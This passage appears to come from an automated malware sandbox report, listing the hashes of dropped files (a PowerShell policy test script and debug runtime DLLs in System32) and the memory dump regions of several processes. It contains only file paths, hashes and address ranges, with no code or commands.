                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                SHA256

                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                SHA512

                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yxl3ern.dsn.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Windows\System32\ucrtbased.dll

                                Filesize

                                1.8MB

                                MD5

                                7873612dddd9152d70d892427bc45ef0

                                SHA1

                                ab9079a43a784471ca31c4f0a34b698d99334dfa

                                SHA256

                                203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

                                SHA512

                                d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

                              • C:\Windows\System32\vcruntime140_1d.dll

                                Filesize

                                52KB

                                MD5

                                9ef28981adcbf4360de5f11b8f4ecff9

                                SHA1

                                219aaa1a617b1dfa36f3928bd1020e410666134f

                                SHA256

                                8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                SHA512

                                ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                              • C:\Windows\System32\vcruntime140d.dll

                                Filesize

                                162KB

                                MD5

                                a366d6623c14c377c682d6b5451575e6

                                SHA1

                                a8894fcfb3aa06ad073b1f581b2e749b54827971

                                SHA256

                                7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

                                SHA512

                                cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

                              • memory/380-175-0x000001B58C6A0000-0x000001B58C6C7000-memory.dmp

                                Filesize

                                156KB

                              • memory/380-120-0x000001B58C6A0000-0x000001B58C6C7000-memory.dmp

                                Filesize

                                156KB

                              • memory/616-160-0x000001936B350000-0x000001936B377000-memory.dmp

                                Filesize

                                156KB

                              • memory/616-108-0x000001936B0C0000-0x000001936B0E1000-memory.dmp

                                Filesize

                                132KB

                              • memory/616-114-0x00007FF828A8D000-0x00007FF828A8E000-memory.dmp

                                Filesize

                                4KB

                              • memory/616-111-0x000001936B350000-0x000001936B377000-memory.dmp

                                Filesize

                                156KB

                              • memory/616-117-0x00007FF828A8F000-0x00007FF828A90000-memory.dmp

                                Filesize

                                4KB

                              • memory/668-176-0x00007FF828A8F000-0x00007FF828A90000-memory.dmp

                                Filesize

                                4KB

                              • memory/668-170-0x000001A707A30000-0x000001A707A57000-memory.dmp

                                Filesize

                                156KB

                              • memory/668-115-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/668-112-0x000001A707A30000-0x000001A707A57000-memory.dmp

                                Filesize

                                156KB

                              • memory/684-181-0x0000027888760000-0x0000027888787000-memory.dmp

                                Filesize

                                156KB

                              • memory/684-129-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/684-126-0x0000027888760000-0x0000027888787000-memory.dmp

                                Filesize

                                156KB

                              • memory/744-125-0x000001EA01D70000-0x000001EA01D97000-memory.dmp

                                Filesize

                                156KB

                              • memory/744-179-0x000001EA01D70000-0x000001EA01D97000-memory.dmp

                                Filesize

                                156KB

                              • memory/744-127-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/964-133-0x0000023AE31D0000-0x0000023AE31F7000-memory.dmp

                                Filesize

                                156KB

                              • memory/964-135-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/964-182-0x0000023AE31D0000-0x0000023AE31F7000-memory.dmp

                                Filesize

                                156KB

                              • memory/968-119-0x0000014162C10000-0x0000014162C37000-memory.dmp

                                Filesize

                                156KB

                              • memory/968-178-0x0000014162C10000-0x0000014162C37000-memory.dmp

                                Filesize

                                156KB

                              • memory/968-122-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/1064-142-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/1064-183-0x000001DF996E0000-0x000001DF99707000-memory.dmp

                                Filesize

                                156KB

                              • memory/1064-139-0x000001DF996E0000-0x000001DF99707000-memory.dmp

                                Filesize

                                156KB

                              • memory/1080-184-0x000001B92A540000-0x000001B92A567000-memory.dmp

                                Filesize

                                156KB

                              • memory/1080-144-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/1080-141-0x000001B92A540000-0x000001B92A567000-memory.dmp

                                Filesize

                                156KB

                              • memory/1140-143-0x00000235A02E0000-0x00000235A0307000-memory.dmp

                                Filesize

                                156KB

                              • memory/1140-147-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/1140-185-0x00000235A02E0000-0x00000235A0307000-memory.dmp

                                Filesize

                                156KB

                              • memory/1176-59-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1176-90-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1176-91-0x00007FF8271D0000-0x00007FF82728E000-memory.dmp

                                Filesize

                                760KB

                              • memory/1176-89-0x000001AA2A360000-0x000001AA2A38E000-memory.dmp

                                Filesize

                                184KB

                              • memory/1176-88-0x000001AA2A400000-0x000001AA2A43C000-memory.dmp

                                Filesize

                                240KB

                              • memory/1176-77-0x000001AA2A750000-0x000001AA2A912000-memory.dmp

                                Filesize

                                1.8MB

                              • memory/1176-75-0x000001AA2A4C0000-0x000001AA2A572000-memory.dmp

                                Filesize

                                712KB

                              • memory/1176-74-0x000001AA2A3B0000-0x000001AA2A400000-memory.dmp

                                Filesize

                                320KB

                              • memory/1176-66-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1176-65-0x000001AA29CF0000-0x000001AA29DA2000-memory.dmp

                                Filesize

                                712KB

                              • memory/1176-64-0x000001AA29890000-0x000001AA29CEC000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/1176-63-0x000001AA290D0000-0x000001AA29890000-memory.dmp

                                Filesize

                                7.8MB

                              • memory/1176-62-0x000001AA28C90000-0x000001AA290D4000-memory.dmp

                                Filesize

                                4.3MB

                              • memory/1176-61-0x000001AA0E500000-0x000001AA0E510000-memory.dmp

                                Filesize

                                64KB

                              • memory/1176-60-0x00007FF8271D0000-0x00007FF82728E000-memory.dmp

                                Filesize

                                760KB

                              • memory/1176-58-0x000001AA0E500000-0x000001AA0E510000-memory.dmp

                                Filesize

                                64KB

                              • memory/1176-57-0x000001AA0E500000-0x000001AA0E510000-memory.dmp

                                Filesize

                                64KB

                              • memory/1176-56-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1176-173-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1180-149-0x00007FF7E8A70000-0x00007FF7E8A80000-memory.dmp

                                Filesize

                                64KB

                              • memory/1180-146-0x000001EEB1630000-0x000001EEB1657000-memory.dmp

                                Filesize

                                156KB

                              • memory/1180-186-0x000001EEB1630000-0x000001EEB1657000-memory.dmp

                                Filesize

                                156KB

                              • memory/1264-187-0x00000207D58B0000-0x00000207D58D7000-memory.dmp

                                Filesize

                                156KB

                              • memory/1312-188-0x000001F6C67A0000-0x000001F6C67C7000-memory.dmp

                                Filesize

                                156KB

                              • memory/1312-177-0x00007FF828A8C000-0x00007FF828A8D000-memory.dmp

                                Filesize

                                4KB

                              • memory/1312-166-0x00007FF828A8D000-0x00007FF828A8E000-memory.dmp

                                Filesize

                                4KB

                              • memory/2060-21-0x00007FF8271D0000-0x00007FF82728E000-memory.dmp

                                Filesize

                                760KB

                              • memory/2060-17-0x000001C9E63E0000-0x000001C9E63F0000-memory.dmp

                                Filesize

                                64KB

                              • memory/2060-15-0x000001C9E6300000-0x000001C9E6322000-memory.dmp

                                Filesize

                                136KB

                              • memory/2060-16-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2060-76-0x000001C9E63E0000-0x000001C9E63F0000-memory.dmp

                                Filesize

                                64KB

                              • memory/2060-27-0x000001C9819A0000-0x000001C9819AC000-memory.dmp

                                Filesize

                                48KB

                              • memory/2060-28-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/2060-71-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2060-18-0x000001C9E63E0000-0x000001C9E63F0000-memory.dmp

                                Filesize

                                64KB

                              • memory/2060-26-0x000001C981940000-0x000001C981998000-memory.dmp

                                Filesize

                                352KB

                              • memory/2060-172-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2060-19-0x000001C990490000-0x000001C9904BC000-memory.dmp

                                Filesize

                                176KB

                              • memory/2060-25-0x000001C9816A0000-0x000001C981938000-memory.dmp

                                Filesize

                                2.6MB

                              • memory/2060-24-0x000001C9813B0000-0x000001C98169E000-memory.dmp

                                Filesize

                                2.9MB

                              • memory/2060-22-0x000001C980300000-0x000001C9813AE000-memory.dmp

                                Filesize

                                16.7MB

                              • memory/2060-20-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/2368-32-0x0000000140000000-0x0000000140004000-memory.dmp

                                Filesize

                                16KB

                              • memory/2368-30-0x0000000140000000-0x0000000140004000-memory.dmp

                                Filesize

                                16KB

                              • memory/3196-103-0x0000000140000000-0x0000000140028000-memory.dmp

                                Filesize

                                160KB

                              • memory/3196-92-0x0000000140000000-0x0000000140028000-memory.dmp

                                Filesize

                                160KB

                              • memory/3196-94-0x0000000140000000-0x0000000140028000-memory.dmp

                                Filesize

                                160KB

                              • memory/3196-99-0x00007FF8271D0000-0x00007FF82728E000-memory.dmp

                                Filesize

                                760KB

                              • memory/3196-95-0x00007FF8289F0000-0x00007FF828BE5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/4056-174-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4056-78-0x00007FF809A30000-0x00007FF80A4F1000-memory.dmp

                                Filesize

                                10.8MB